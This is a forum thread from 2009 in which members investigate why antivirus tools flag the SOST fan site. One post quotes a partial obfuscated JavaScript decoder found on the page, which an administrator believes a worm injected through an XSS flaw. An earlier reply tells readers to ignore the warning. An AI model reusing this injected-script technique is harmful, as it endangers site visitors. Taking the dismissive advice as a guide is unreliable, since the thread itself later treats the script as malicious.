don't click here

SOST is full of viruses

Discussion in 'General Sonic Discussion' started by MathUser, Nov 15, 2009.

Thread Status:
Not open for further replies.
  1. MathUser

    MathUser

    3rd top wiki contributor Researcher
    2,151
    8
    18
    When I go to SOST nowdays AVG attempts to block access to it for some reason. This is the screen I get when accesing the site:

    [​IMG]
     
  2. Blue Blood

    Blue Blood

    Member
    5,903
    823
    93
    Haha, yes. This was mentioned a week or two ago. Dunno how long they've been there for, but it's quite annoying.
     
  3. Just went there to test it it out. You're not the only one getting them.
     
  4. Spanner

    Spanner

    The Tool Member
    Andy Wolan is too busy (EDIT - Inflammatory - T) playing softball to fix the entire Emulation Zone. :(
    I believe that GerbilSoft downloaded the entire SOST for wiki images though. If SOST is still required perhaps permission could be sought to host it elsewhere?
     
  5. Phos

    Phos

    Going for the high score on whatever that little b Member
    3,318
    0
    0
    Getting them with Avast as well.
     
  6. Skyler

    Skyler

    Neonネオン Cowgirlカウガール Site Staff
    3,287
    32
    28
    Hellafornia
    The next audtion
    Hasn't the site been long since abandoned by Rlan for a few years now? That could be a contributing cause.
     
  7. Cooljerk

    Cooljerk

    NotEqual Tech, Inc - VR & Game Dev Oldbie
    4,505
    201
    43
    I've offered to maintain it for Rlan 3 or 4 times and he always says he'll consider it, then never gets back to me. Rlan indeed has abandoned the site, and he said his intention is to make a sister site that is like Sost, but more generalized (I.e. not necessarily about sonic, sort of like how Sonic Cult became Hacking Cult).

    I'd still be down to maintain it, though.
     
  8. Don't you mean "how Sonic Cult became X-Cult" ?
     
  9. Cooljerk

    Cooljerk

    NotEqual Tech, Inc - VR & Game Dev Oldbie
    4,505
    201
    43
    Er, right. Too many cults to keep up with.
     
  10. Revival

    Revival

    The AppleTalk Network System Member
    200
    0
    16
    It's because the small amount of javascript at SoST is obfuscated. As a result of this, anti-virus programs will fire a warning in case the obfuscated javascript is an XSS exploit in disguise or whatever. Ignore the warning.
     
  11. Digital Xeron

    Digital Xeron

    [An error occurred while processing this custom ti Oldbie
    187
    1
    0
    Unicomplex One, Canada
    Digibase Operations (TSZP)
    I have to agree, possibly to make ad blocking more difficult, it is also possible the same code has been used on malware sites, thus setting off AV software as some malware (and associated websites) use code that's extremely similar to legitimate code to make it all that much more difficult for AV software to blacklist without effecting legitimate software and websites.
     
  12. Quexinos

    Quexinos

    Since 1997 Oldbie
    1,677
    10
    18
    Well wow thanks for the warning, even though I'm on Linux I won't be going there any time soon.
     
  13. Revival

    Revival

    The AppleTalk Network System Member
    200
    0
    16
    I decided to make sure that the reason for the warning was obfuscated javascript, and it seems so:
    Code (Text):
    1. function urb(GihZlaf){var XNoZdYIaJq=7,qtTAU=8;var YxseDmCjJ='86+5,53+3,34+1,91+0,101+4,101+4,98+0,50+6,41+1,41+1,101+4,84+7,98+0,91+7,99+
    2. 6,97+1,101+4,88+3,96+2,40+2,91+7,96+2,89+2,97+1,41+1,94+4,91+7,96+2,40+2,86+5,90+
    3. 1,91' +
    4. '7,55+1,92+6,106+6,97+1,34+1,54+2,52+4,41+1,91+7,89+2,99+6,84+7,95+3,88+3,54+
    5. 2,',mGnbjgWJ=YxseDmCjJ.split(',');youWKW='';
    6. for(dJC=0;dJC<mGnbjgWJ.length-1;dJC++){ vHFjYLk=mGnbjgWJ[dJC].split('+');
    7. FUGSFoNTNh = parseInt(vHFjYLk[0]*qtTAU)+parseInt(vHFjYLk[1]);FUGSFoNTNh = parseInt(FUGSFoNTNh)/XNoZdYIaJq;youWKW += String.fromCharCode(FUGSFoNTNh);}return youWKW;}
    8. document['wri5te'.replace(/[0-9]/,'')](RXWtGlQ('GWbkhEiw')+urb('vvAWXu'));
    Take a look at the coding for that function. There isn't even proper spacing.

    EDIT: Wow, there's actually 2 functions hidden within that code. I've spaced it just enough to stop it stretching the tables.
     
  14. Andeh

    Andeh

    Derp herp. Oldbie
    God, that's horrible, I could never write code like that. I need whitespace.
     
  15. Overlord

    Overlord

    Now playable in Smash Bros Ultimate Moderator
    19,240
    974
    93
    Long-term happiness
    What's the point of the obfuscation anyway? The worst that could happen is someone uses his javascript on their own site - OH GOD NO? =P
     
  16. Shadix

    Shadix

    Oldbie
    955
    1
    0
    Rlan sure does have a habit of starting up pretty popular sites and then abandoning them. :\
     
  17. GerbilSoft

    GerbilSoft

    RickRotate'd. Administrator
    2,971
    76
    28
    USA
    rom-properties
    That script wasn't added deliberately. A search for the function name results in lots of hits regarding XSS exploits, so I'm guessing some worm managed to exploit a vulnerability in the site and inject the malicious javascript into the page.
     
Thread Status:
Not open for further replies.